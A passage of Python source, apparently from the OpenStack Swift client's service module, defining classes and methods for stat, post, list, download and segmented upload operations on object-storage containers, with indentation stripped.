options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: An array of 'Key: Value' strings
:param prefix: String to prepend to all of the keys in the dictionary.
reporting.
"""
headers = {}
for item in options:
split_item = item.split(':', 1)
if len(split_item) == 2:
headers[(prefix + split_item[0]).title()] = split_item[1]
else:
raise SwiftError(
"Metadata parameter %s must contain a ':'.\n%s"
% (item, "Example: 'Color:Blue' or 'Size:Large'")
)
return headers
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not isinstance(object_name, string_types) or not object_name:
raise SwiftError(
"Object names must be specified as non-empty strings"
)
else:
self.object_name = object_name
self.options = options
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_etag = headers.get('etag')
if ('x-object-manifest' not in headers
and 'x-static-large-object' not in headers and checksum):
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_etag:
etag = self._actual_md5.hexdigest()
if etag != self._expected_etag:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_etag))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix']
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter']
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb')
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(65536)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': 65536,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb')
else:
if basename(path):
fp = open(path, 'wb')
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if 'x-object-meta-mtime' in headers and not no_file:
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises: SwiftError
:raises: ClientException
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# Incase we have a psudeo-folder path for <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name. (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
try:
fp = open(path, 'rb')
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
try:
fp = open(path, 'rb')
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(65536, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
